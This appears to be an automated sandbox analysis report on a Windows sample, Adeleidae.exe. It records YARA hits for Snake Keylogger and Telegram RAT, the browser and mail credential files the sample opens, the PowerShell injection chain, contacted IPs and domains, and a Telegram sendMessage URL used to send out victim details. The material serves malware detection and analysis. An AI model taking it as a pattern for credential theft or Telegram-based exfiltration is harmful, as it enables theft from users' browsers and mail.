Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Adeleidae.exe Code function: 0_2_00406077 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00406077

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000006.00000002.3023161132.0000000025771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 8056, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000006.00000002.3023161132.0000000025878000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000006.00000002.3023161132.0000000025771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 8056, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1540728 Sample: Adeleidae.exe Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 34 reallyfreegeoip.org 2->34 36 api.telegram.org 2->36 38 5 other IPs or domains 2->38 44 Found malware configuration 2->44 46 Antivirus detection for dropped file 2->46 48 Antivirus / Scanner detection for submitted sample 2->48 54 6 other signatures 2->54 8 Adeleidae.exe 3 31 2->8         started        signatures3 50 Tries to detect the country of the analysis system (by using the IP) 34->50 52 Uses the Telegram API (likely for C&C communication) 36->52 process4 file5 22 C:\Users\user\AppData\Local\...\Foredes.Add, ASCII 8->22 dropped 56 Suspicious powershell command line found 8->56 12 powershell.exe 28 8->12         started        signatures6 process7 file8 24 C:\Users\user\AppData\Local\...\Adeleidae.exe, PE32 12->24 dropped 26 C:\Users\...\Adeleidae.exe:Zone.Identifier, ASCII 12->26 dropped 58 Early bird code injection technique detected 12->58 60 Writes to foreign memory regions 12->60 62 Found suspicious powershell code related to unpacking or dynamic code loading 12->62 64 3 other signatures 12->64 16 msiexec.exe 15 8 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 28 api.telegram.org 149.154.167.220, 443, 50021 TELEGRAMRU United Kingdom 16->28 30 smtp.ionos.es 213.165.67.102, 50022, 587 ONEANDONE-ASBrauerstrasse48DE Germany 16->30 32 4 other IPs or domains 16->32 40 Tries to steal Mail credentials (via file / registry access) 16->40 42 Tries to harvest and steal browser information (history, passwords, etc) 16->42 signatures12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
132.226.8.169
 checkip.dyndns.com United States
16989 UTMEMUS false
142.250.185.78
 drive.google.com United States
15169 GOOGLEUS false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
213.165.67.102
 smtp.ionos.es Germany
8560 ONEANDONE-ASBrauerstrasse48DE true
142.250.186.161
 drive.usercontent.google.com United States
15169 GOOGLEUS false
188.114.96.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
drive.google.com 142.250.185.78 true
drive.usercontent.google.com 142.250.186.161 true
reallyfreegeoip.org 188.114.96.3 true
smtp.ionos.es 213.165.67.102 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 132.226.8.169 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216041%0D%0ADate%20and%20Time:%2024/10/2024%20/%2018:06:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216041%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
    		unknown
    https://reallyfreegeoip.org/xml/173.254.250.71 false
      		unknown
      http://checkip.dyndns.org/ false
      • URL Reputation: safe
      		 unknown